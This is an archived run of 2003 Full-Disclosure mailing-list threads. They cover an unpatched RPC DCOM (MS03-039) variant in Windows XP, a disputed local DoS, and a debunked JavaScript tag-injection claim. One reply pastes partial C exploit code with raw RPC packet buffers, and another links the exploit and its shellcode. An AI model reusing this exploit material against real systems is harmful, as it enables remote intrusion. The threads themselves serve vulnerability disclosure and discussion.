Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Local DoS in windows.
Steve Wray wrote: How long do you have to hold the mouse button down for? I see no effect after about 30 seconds then I got bored... Tried in outlook and wordpad. In fact the 'ambient' CPU useage actually appeared to flatten out. Seems to me that users of FD and bugtraq have just been social engineered into wasting a couple man-hours 'testing' for this XP bug. Not quite Scaggs-worthy, granted, but it did manage to tie up Steve for half a minute. :) Cael ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Quoting Brown, Bobby (US - Hermitage) ([EMAIL PROTECTED]): For us that can not interpret the site, what more information can be provided. Funny enough, it is a russian translatiion of the original message you replying to: - Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Yeah, but the original poster 3APA3A withheld the actual exploit, which is available on that site. - Original Message - From: Vladimir Parkhaev [EMAIL PROTECTED] Funny enough, it is a russian translatiion of the original message you replying to: - Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Local DoS in windows.
--- [Affected] --- We have only tried it in windows Xp. --- [Bug Details] --- http://www.geocities.com/visitbipin/win_dos.jpg The image is self explanatory... --- [Description] --- When you click to any close, maximize or minimize button's in windows Xp, [No matter whether it's IE or a WordPad] surprisingly there is 100% CPU use at the instant and it continues until you release the button! Moreover, we've noticed if you continuously click the button for a long time [... not release it and hold ON ] we've seen gradual/slow rise in page-file use too...!!! --- [Conclusion] --- Hell... local DoS! That could be used by employees working at different terminal. (O; --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. The vendor was notified via email. http://www.ysgnet.com/hn --- [I want a JOB/scholarship... anyone??? - hUNT3R] --- __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
--- [Effected] --- All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! --- [Proof of concept] --- We have made a small script. Check it out, http://www.cyberdude.com.np/javascript.htm --- [Bug Details] --- html body pTHIS IS hUNT3R aka: Bipin Gautam/p scriptalert(scriptlocation.href=http://www.ysgnet.com;/script)/script /body /html html body pTHIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude/p script document.write(bhUNTER Cyberdude/b/scriptscriptalert(it works 1); alert(This works 2); /script /body /html * --[Description]--- The browser is letting you compile some-thing inside the alert function. Well, its should show it anyways without compiling the script tag as it is inside the quotation. But surprising, the output is different! We found JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for document.write(); function. This means that this script is going to choke bad and you wont get any output but just the ); thats all. This script is working. Its not that it is not working. It works in the starting script tag but when the html parses the script tag inside the document.write it goes mad coz nested scripting is not possible in HTML, the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. but we can still insert the java script in it. What we did was, we inserted the closing tag of JavaScript /script first closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the java script. --- [Conclusion] --- This proves injection of JavaScript inside a JavaScript making it available to use the current variable and change some static values predefined and even access other function without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen. --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new Level. http://www.ysgnet.com/hn ---[I want a JOB/scholarship... anyone??? - hUNT3R]--- __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: For us that can not interpret the site, what more information can be provided. I believe if you use babelfish.altavista.com, you'll come to: http://forum.securitylab.ru/forum_posts.asp?TID=5642PN=0TPN=3 The code itself is: #include stdio.h #include winsock2.h #include windows.h #include process.h #include string.h #include winbase.h FILE *fp1; unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
The browser is letting you compile some-thing inside the alert function. Well, its should show it anyways without compiling the script tag as it is inside the quotation. But surprising, the output is different! This proves injection of JavaScript inside a JavaScript making it available to use the current variable and change some static values predefined and even access other function without a problem. THIS COULD BE USED IN MANY ATTACK AND CAN BE A LOT OF PROBLEM TO THE WEBSITE where poor JS is used... --- --- jelmer [EMAIL PROTECTED] wrote: This is the code you send html body pTHIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude/p script document.write(bhUNTER Cyberdude/b/scriptscriptalert(it works 1); alert(This works 2); /script /body /html this gives an Unterminated string constant error followed by 2 alerts, which is exactly what it should do 1. scriptdocument.write(bhUNTER Cyberdude/b/script this gives the unterminated string constant, your simply not closing your string, bhUNTER Cyberdude never gets written out 2. scriptalert(it works 1); alert(This works 2); /script This is perfectly valid and thus executes I really dont see what your trying to do or what the threat would be when you got whatever your trying to do to work --jelmer - Original Message - From: bipin gautam [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 7:16 PM Subject: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler? --- [Effected] --- All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! --- [Proof of concept] --- We have made a small script. Check it out, http://www.cyberdude.com.np/javascript.htm --- [Bug Details] --- html body pTHIS IS hUNT3R aka: Bipin Gautam/p scriptalert(scriptlocation.href=http://www.ysgnet.com;/script)/scr ipt /body /html html body pTHIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude/p script document.write(bhUNTER Cyberdude/b/scriptscriptalert(it works 1); alert(This works 2); /script /body /html * --[Description]--- The browser is letting you compile some-thing inside the alert function. Well, its should show it anyways without compiling the script tag as it is inside the quotation. But surprising, the output is different! We found JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for document.write(); function. This means that this script is going to choke bad and you wont get any output but just the ); that's all. This script is working. Its not that it is not working. It works in the starting script tag but when the html parses the script tag inside the document.write it goes mad coz nested scripting is not possible in HTML, the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. but we can still insert the java script in it. What we did was, we inserted the closing tag of JavaScript /script first closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the java script. --- [Conclusion] --- This proves injection of JavaScript inside a JavaScript making it available to use the current variable and change some static values predefined and even access other function without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen. --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new Level. http://www.ysgnet.com/hn ---[I want a JOB/scholarship... anyone??? - hUNT3R]--- __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Not much info on the page but here goes the juicy part. Exploit: http://www.securitylab.ru/_exploits/rpc2.c.txt Shellcode: http://www.securitylab.ru/_exploits/shell.asm.txt Based on user responses, this is, in fact, working exploit that will work on already patched systems. It's only a matter of time for compiled binary to surface. Dimitri |-+-- | | Brown, Bobby (US -| | | Hermitage)| | | [EMAIL PROTECTED]| | | Sent by: | | | [EMAIL PROTECTED]| | | .netsys.com| | | | | | | | | 10/10/2003 03:34 PM| | | | |-+-- --| | | | To: 'Alex' [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], | |[EMAIL PROTECTED] | | cc: [EMAIL PROTECTED] | | Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability | --| For us that can not interpret the site, what more information can be provided. Bobby -Original Message- From: Alex [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:09 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability Exploit code can be found here: http://www.securitylab.ru/40754.html This code work with all security fixes. It's very dangerous. - Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message. Any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Local DoS in windows.
well... that works on mine! and the computer that i have tested it on! ARE YOU USING WINDOWS XP PRO??? well... in 2-3 sec and you contniously click the button HELL IT WORK! YOU AREN'T A MICROSOFT EMPLOYEE ... ARE YOU??? --- Steve Wray [EMAIL PROTECTED] wrote: How long do you have to hold the mouse button down for? I see no effect after about 30 seconds then I got bored... Tried in outlook and wordpad. In fact the 'ambient' CPU useage actually appeared to flatten out. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of bipin gautam Sent: Saturday, 11 October 2003 6:18 a.m. To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Local DoS in windows. --- [Affected] --- We have only tried it in windows Xp. --- [Bug Details] --- http://www.geocities.com/visitbipin/win_dos.jpg The image is self explanatory... --- [Description] --- When you click to any close, maximize or minimize button's in windows Xp, [No matter whether it's IE or a WordPad] surprisingly there is 100% CPU use at the instant and it continues until you release the button! Moreover, we've noticed if you continuously click the button for a long time [... not release it and hold ON ] we've seen gradual/slow rise in page-file use too...!!! --- [Conclusion] --- Hell... local DoS! That could be used by employees working at different terminal. (O; --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. The vendor was notified via email. http://www.ysgnet.com/hn ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 *Gasp!* You've never seen Babel Fish translate a webpage? http://babelfish.altavista.com/ And select Translate a Web Page... Presto! It's rough, but gets you close enough. Regards, - -Matt. - -- Matthew D. Lammers, CISSP Columbus, Ohio, US - -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brown, Bobby (US - Hermitage) Sent: Friday, October 10, 2003 3:34 PM To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability For us that can not interpret the site, what more information can be provided. Bobby - -Original Message- From: Alex [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:09 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability Exploit code can be found here: http://www.securitylab.ru/40754.html -BEGIN PGP SIGNATURE- Version: PGP 8.0 iQA/AwUBP4cgtwcf69dS5KepEQL5xQCeJjvocPI8r/qPCYCP61MvbGuxxWgAoJie I6zE7ut38aXb1SpOaIK8vY91 =dNPg -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html